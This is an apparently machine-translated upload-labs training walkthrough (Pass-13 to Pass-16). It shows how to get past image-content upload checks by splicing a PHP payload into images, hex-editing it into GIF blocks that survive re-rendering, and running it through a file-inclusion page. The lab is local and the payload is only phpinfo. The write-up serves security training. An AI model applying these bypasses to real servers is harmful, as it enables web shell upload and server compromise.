File upload content check bypasses

First step , Open the network topology , Start the experimental virtual machine .

The second step , Open the Chrome browser , Enter in the address bar http://127.0.0.1, Get into upload-labs On the page , Then click the navigation bar on the left Pass-13 Enter the gate 13

In the task prompt, the upload format is required to be .jpg\.png\.gif And contain a sentence or webshell Pictures of horses , Click the view source code button

On the fourth line of the code $bin = fread($file, 2); Read the first two bytes of the file , Then looking down, there is a unpack function , Unpack byte strings into variables , And store the variables in two arrays, which are chars1 and chars2 in , And by the intval Convert to decimal , After the processing of this code , The first two bytes in the file header will be represented by decimal information , Next is a switch The judgment of the , The format of the judgment file is jpg、png、gif Files are allowed to upload and jump into the uploaded program , Otherwise, it is judged as unknown It will prompt that the upload failed . The program mainly takes the first two bytes of the uploaded file to judge the file type , So here you can upload pictures directly , The operation is as follows ： Open the pentestbox Enter the command cd C:\Users\Administrator\Desktop\ steganography Images\gif,

Create a file with the content <?php phpinfo(); ?> Of shell.php file , Then use the command copy cat_tldzFZS.jpg /b + shell.php /a webshell.jpg Splicing pictures and Trojans ,

Move the picture to the desktop , Then return to the upload page , Upload the picture and open the agent at the same time burpsuite Carry out the bag ,

For the convenience of observing the uploaded path , Right click the mouse and select Send to Repeater Send packets to Repeater In the repeater , Then go straight to Go Send packet

Upload successful , Turn off the agent function .

The third step , At present, this vulnerability cannot be exploited alone , It needs to be used together with file containing vulnerabilities , Because the website is local , We simulate this process directly in the local website , Enter the path C:\Program Files (x86)\upload-labs\WWW in , Write a simple existence file containing the page

This file has been written to the website , You don't need to create... When doing experiments yourself , We have direct access to http://127.0.0.1/include.php that will do ,

Next, the construction uses the end of the page to add ?file=upload/8620200104160811.jpg, Revisit

Use success .

Step four , Go back to the home page of the website , Click on the left navigation bar Pass-14 Enter the gate 14, It's still the horse that uploads pictures , Click the show source code button to view the source code

Here we use getimagesize Get file type , You can still use the picture horse to bypass , Here is a brief addition getimagesize Knowledge points of

Upload with the image Trojan horse in the previous step , And look at /upload/ The name of the upload in the folder

visit /include.php And construction /include.php?file=upload/9120200104164552.jpeg

Step five , Return to the homepage of the website again , Click on the left navigation bar Pass-15 Enter the gate 15, It's still the horse that uploads pictures , Click the show source code button to view the source code and find that the function has been changed

Used exif_imagetype() function , Read the first byte of an image and check its signature , The bypass method is the same as Pass-13 equally , Omit the reproduction process , After the above experiment .

Step six , Go to the homepage , Click on the left navigation bar Pass-16 Enter the gate 16, It's still the horse that uploads pictures , Click the show source code button to view the source code

By reviewing the code of the entire file , Judged the suffix 、centent-type And the use of imagecreatefromgif/jepg/png Judge whether it is gif、jepg、png picture , Finally, I did a second rendering . Take a look at the document about detection gif Code for

The first 61 The line passes through two functions $fileext and $filetype Check whether the file is gif Format , The first 62 The line is used. move_uploaded_file Function to make conditional judgment , If the file is successfully moved to $target_path, You will enter the code of secondary rendering , Otherwise, the upload fails

The idea of cracking this level is roughly ： First upload a gif picture , Then upload gif And local gif Compare the pictures , Find the same data block part , And then phpinfo() Insert the code of the function .

Step seven , First upload an ordinary gif picture , Get into C:\test route , The picture test.gif Copy to the desktop , Renamed as 1.gif Then upload it on the web 1.gif

visit /upload/

Click on 4575.gif Open the picture and save the file locally as 2.gif

Then use the Hex Editor Neo open 2.gif Picture vs 1.gif By comparison, it is found that a0 The contents of the two pictures are consistent in the line ,

Direct will 2.gif Of a0 The character of the position is changed to <?php phpinfo(); ?>

Finally, save the file as 3.gif, Upload . visit upload Directory get the name of the uploaded file

Use include.php Include this file